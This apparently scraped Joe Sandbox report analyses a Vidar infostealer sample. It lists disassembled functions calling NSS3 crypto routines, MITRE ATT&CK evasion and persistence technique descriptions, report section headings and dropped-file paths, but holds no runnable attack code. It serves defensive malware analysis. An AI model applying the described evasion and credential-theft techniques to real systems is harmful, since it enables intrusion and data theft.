Part of subcall function 68D90BE0: TlsGetValue.KERNEL32(68D88D2D,?,00000000,?), ref: 68D90C15

free.MOZGLUE(00000000), ref: 68D428D2

Strings

@uU~/, xrefs: 68D4280C

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Alloc_UtilValuefreemalloc
String ID: @uU~/
API String ID: 1932469452-2989128320
Opcode ID: f75216fdc8195ab6b076ba7554bc6c0a982fef4141011d37daa432b33b44a1de
Instruction ID: db53cc8f5402413a0d3469d3ab3cb90e5f2b3899447ce33bb4e1d7ec5f740552
Opcode Fuzzy Hash: f75216fdc8195ab6b076ba7554bc6c0a982fef4141011d37daa432b33b44a1de
Instruction Fuzzy Hash: 8831A4756002059FDB14DF18EC85EAE37B5FF4A358B050029E55A87350DB31ED15CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 68D3AC50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 68D3ACDC

Part of subcall function 68D506A0: TlsGetValue.KERNEL32 ref: 68D506C2
Part of subcall function 68D506A0: EnterCriticalSection.KERNEL32(?), ref: 68D506D6
Part of subcall function 68D506A0: PR_Unlock.NSS3 ref: 68D506EB

Part of subcall function 68D53810: TlsGetValue.KERNEL32(?,68D3A8F0,?,00000000), ref: 68D53827
Part of subcall function 68D53810: EnterCriticalSection.KERNEL32(?,?,68D3A8F0,?,00000000), ref: 68D53840
Part of subcall function 68D53810: TlsGetValue.KERNEL32(?,?,?,68D3A8F0,?,00000000), ref: 68D5385A
Part of subcall function 68D53810: EnterCriticalSection.KERNEL32(?,?,?,?,68D3A8F0,?,00000000), ref: 68D5386F
Part of subcall function 68D53810: PL_HashTableLookup.NSS3(?,?,?,?,?,68D3A8F0,?,00000000), ref: 68D53888
Part of subcall function 68D53810: PR_Unlock.NSS3(?,?,?,?,?,68D3A8F0,?,00000000), ref: 68D53895
Part of subcall function 68D53810: PR_Unlock.NSS3(?,?,?,?,?,68D3A8F0,?,00000000), ref: 68D538B6

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,68DA4E82,?), ref: 68D3ACB7

Part of subcall function 68D8F9A0: PORT_ArenaMark_Util.NSS3(?,00000000,-00000002,?,-00000002,?,68D2F379,?,00000000,-00000002), ref: 68D8F9B7

Strings

@uU~/, xrefs: 68D3AC5C

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$Util$AllocArenaErrorHashItem_LookupMark_Table
String ID: @uU~/
API String ID: 3179275099-2989128320
Opcode ID: c305ecea705182976bfce3bc38ff5d3ad8e41a68aeee2de973422a99bb828f46
Instruction ID: faa58c6f1c73c359234615bca33886624dd01c773e0923adcb96f7294bf27859
Opcode Fuzzy Hash: c305ecea705182976bfce3bc38ff5d3ad8e41a68aeee2de973422a99bb828f46
Instruction Fuzzy Hash: 7821F9B9B006259FEF14AF24ED40F7B73A8AF462D4F850028D925A7241FB21EC10C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 68D42C70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 68D83440: PK11_GetAllTokens.NSS3 ref: 68D83481
Part of subcall function 68D83440: PR_SetError.NSS3(00000000,00000000), ref: 68D834A3
Part of subcall function 68D83440: TlsGetValue.KERNEL32 ref: 68D8352E
Part of subcall function 68D83440: EnterCriticalSection.KERNEL32(?), ref: 68D83542
Part of subcall function 68D83440: PR_Unlock.NSS3(?), ref: 68D8355B

PK11_GenerateKeyPairWithOpFlags.NSS3(00000000,00001040,?,?,0000008A,00080000,00080800,?,?,?,?,?,?,?,?), ref: 68D42CC1

Part of subcall function 68D56D90: memcpy.VCRUNTIME140(?,68E5A8EC,0000006C), ref: 68D56DC6
Part of subcall function 68D56D90: memcpy.VCRUNTIME140(?,68E5A958,0000006C), ref: 68D56DDB
Part of subcall function 68D56D90: memcpy.VCRUNTIME140(?,68E5A9C4,00000078), ref: 68D56DF1
Part of subcall function 68D56D90: memcpy.VCRUNTIME140(?,68E5AA3C,0000006C), ref: 68D56E06
Part of subcall function 68D56D90: memcpy.VCRUNTIME140(?,68E5AAA8,00000060), ref: 68D56E1C
Part of subcall function 68D56D90: PR_SetError.NSS3(FFFFE005,00000000), ref: 68D56E38

PK11_GenerateKeyPairWithOpFlags.NSS3(00000000,00001040,?,?,00000046,00080000,00080800,?), ref: 68D42CE8

Part of subcall function 68D56D90: PK11_DoesMechanism.NSS3(?,?), ref: 68D56E76
Part of subcall function 68D56D90: TlsGetValue.KERNEL32 ref: 68D5726F
Part of subcall function 68D56D90: EnterCriticalSection.KERNEL32(?), ref: 68D57283

Strings

@uU~/, xrefs: 68D42C7C

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: memcpy$K11_$CriticalEnterErrorFlagsGeneratePairSectionValueWith$DoesMechanismTokensUnlock
String ID: @uU~/
API String ID: 2473486326-2989128320
Opcode ID: 28416b396bb13559f389ee26bc8b5ceb3f4786aac538ecf71e89963c965749e0
Instruction ID: 1a5c3d76b105f9ce16c0f2c8b37a000a5a32697da106e657fd8b2bf7c834c1e9
Opcode Fuzzy Hash: 28416b396bb13559f389ee26bc8b5ceb3f4786aac538ecf71e89963c965749e0
Instruction Fuzzy Hash: B411CCB56002087BEB115B55AC41FAF366DAB45798F500021FF54AE180EA72E95447F5

Uniqueness

Uniqueness Score: -1.00%

Function 68D869E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 68D86A47
memcpy.VCRUNTIME140(00000000,-00000005,00000001), ref: 68D86A64

Strings

@uU~/, xrefs: 68D869F1

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Alloc_ArenaUtilmemcpy
String ID: @uU~/
API String ID: 9930719-2989128320
Opcode ID: 6b2944133aea150477893d1a1ca157b9521fe698dec2bd4f13fb0c1e63097d25
Instruction ID: 21ae813e391f0a0e510dc499c60c12ea90aa9bce847b7de8205b6c2c386f3283
Opcode Fuzzy Hash: 6b2944133aea150477893d1a1ca157b9521fe698dec2bd4f13fb0c1e63097d25
Instruction Fuzzy Hash: C61159B6E002449BDB18CB69EC68BAF7B65DFC1260F54C13DD94A1B3C0D9309905C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 68D468F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,00000000), ref: 68D4690C

Part of subcall function 68D8BE30: SECOID_FindOID_Util.NSS3(68D4311B,00000000,?,68D4311B,?), ref: 68D8BE44

PR_SetError.NSS3(FFFFE00A,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 68D46946

Part of subcall function 68DDC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 68DDC2BF

Strings

@uU~/, xrefs: 68D468FE

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Util$AlgorithmErrorFindTag_Value
String ID: @uU~/
API String ID: 778764003-2989128320
Opcode ID: 4192aacd525308278cce1c5d9b2080c6486244f7a22c0420c0c69ef5fc75c8aa
Instruction ID: 4c8df490f95fd19be330142cc07b7835f6757ae0ac3f1d4e3bfee316341f3151
Opcode Fuzzy Hash: 4192aacd525308278cce1c5d9b2080c6486244f7a22c0420c0c69ef5fc75c8aa
Instruction Fuzzy Hash: AA11A576A0010AABEF009F55FC019BF3775DFC5694F954028EE1A97340F6319916C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 68D56CB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE028,00000000,68D44D85,?,68D720B1,68D44D85,?,?,68D44D85,?), ref: 68D56D10

Part of subcall function 68D71940: TlsGetValue.KERNEL32(00000000,00000000,?,00000001,?,68D7563C,?,?,00000000,00000001,00000002,?,?,?,?,?), ref: 68D7195C
Part of subcall function 68D71940: EnterCriticalSection.KERNEL32(?,?,68D7563C,?,?,00000000,00000001,00000002,?,?,?,?,?,68D4EAC5,00000001), ref: 68D71970
Part of subcall function 68D71940: PR_Unlock.NSS3(?,?,00000000,00000001,00000002,?,?,?,?,?,68D4EAC5,00000001,?,68D4CE9B,00000001,68D4EAC5), ref: 68D719A0

free.MOZGLUE(68D44D85,?,?,?,?,?,68D44D85,?,68D720B1,68D44D85,?,?,68D44D85,?), ref: 68D56D3E

Strings

@uU~/, xrefs: 68D56CBA

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValuefree
String ID: @uU~/
API String ID: 2146238652-2989128320
Opcode ID: 4130c27299865ab1b3ff7cef624e2df661170efbcf29f15cbfc947b6fe865a3f
Instruction ID: 39401f9a5c76f380e4a6615109e61e2870c183c6dc312c4e6a05d4a46fe702ec
Opcode Fuzzy Hash: 4130c27299865ab1b3ff7cef624e2df661170efbcf29f15cbfc947b6fe865a3f
Instruction Fuzzy Hash: 3A110A75D44204EBDF009F68EC05B6E77649F06350F804456E9196B281E671951087B3

Uniqueness

Uniqueness Score: -1.00%

Function 68E48CA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39threadCOMMON

Download Yara Rule

APIs

PR_snprintf.NSS3(?,00000028,68E68547,7E557540), ref: 68E48CD8

Part of subcall function 68D20F00: PR_GetPageSize.NSS3(68D20936,FFFFE8AE,?,68CB16B7,00000000,?,68D20936,00000000,?,68CB204A), ref: 68D20F1B
Part of subcall function 68D20F00: PR_NewLogModule.NSS3(clock,68D20936,FFFFE8AE,?,68CB16B7,00000000,?,68D20936,00000000,?,68CB204A), ref: 68D20F25

PR_GetCurrentThread.NSS3 ref: 68E48CE5

Strings

@uU~/, xrefs: 68E48CA7

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: CurrentModulePageR_snprintfSizeThread
String ID: @uU~/
API String ID: 1660122677-2989128320
Opcode ID: cf98b2f74326b0dd926b2e84322378e1211ef1d836dab2c3770b75b3443b9db4
Instruction ID: 704f00917241547455aebb2f8d47b4e5f6cdd3f32f830714727b9b78d8fb35ac
Opcode Fuzzy Hash: cf98b2f74326b0dd926b2e84322378e1211ef1d836dab2c3770b75b3443b9db4
Instruction Fuzzy Hash: 6DF0C872D40138ABC704AF79B850B7E36A4EB0A759F91456EE80D9B2D0D7304884CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 68D5CC10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 68D5CC22

Part of subcall function 68D32F00: PORT_NewArena_Util.NSS3(00000800), ref: 68D32F0A
Part of subcall function 68D32F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 68D32F1D

CERT_DestroyCertList.NSS3(00000000), ref: 68D5CC44

Part of subcall function 68D32F50: CERT_DestroyCertificate.NSS3(?), ref: 68D32F65
Part of subcall function 68D32F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 68D32F83

Strings

@uU~/, xrefs: 68D5CC18

Memory Dump Source

Source File: 00000008.00000002.3041793665.0000000068CB1000.00000020.00000001.01000000.00000017.sdmp, Offset: 68CB0000, based on PE: true

Associated: 00000008.00000002.3041762041.0000000068CB0000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042133909.0000000068E8E000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042169908.0000000068E8F000.00000008.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042198729.0000000068E90000.00000004.00000001.01000000.00000017.sdmpDownload File
Associated: 00000008.00000002.3042232515.0000000068E95000.00000002.00000001.01000000.00000017.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_68cb0000_u2xs.jbxd

Similarity

API ID: Util$Arena_CertDestroyList$Alloc_ArenaCertificateFree
String ID: @uU~/
API String ID: 3533527289-2989128320
Opcode ID: de2a505114cbad2a28e788b073bc9293de6a820bc72c8d1072597694f22c717b
Instruction ID: 98d8d2fbdd2341653a8ef1953686e10fb7818a458bab00a462293a2aa59a2680
Opcode Fuzzy Hash: de2a505114cbad2a28e788b073bc9293de6a820bc72c8d1072597694f22c717b
Instruction Fuzzy Hash: 21F0E270E0021987CB00AB7AA91097FB7A49F86188781803AC81CDB200EA30D815C7F2

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

QR Codes

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\$Recycle.Bin\S-1-5-18\desktop.ini

C:\ProgramData\AQRFEVRTGL.docx

C:\ProgramData\ATJBEMHSSB.xlsx

C:\ProgramData\BJZFPPWAPT.xlsx

C:\ProgramData\BKJEGDGIJECGCBGCGHDGIEGCBF

Windows Analysis Report
file.exe

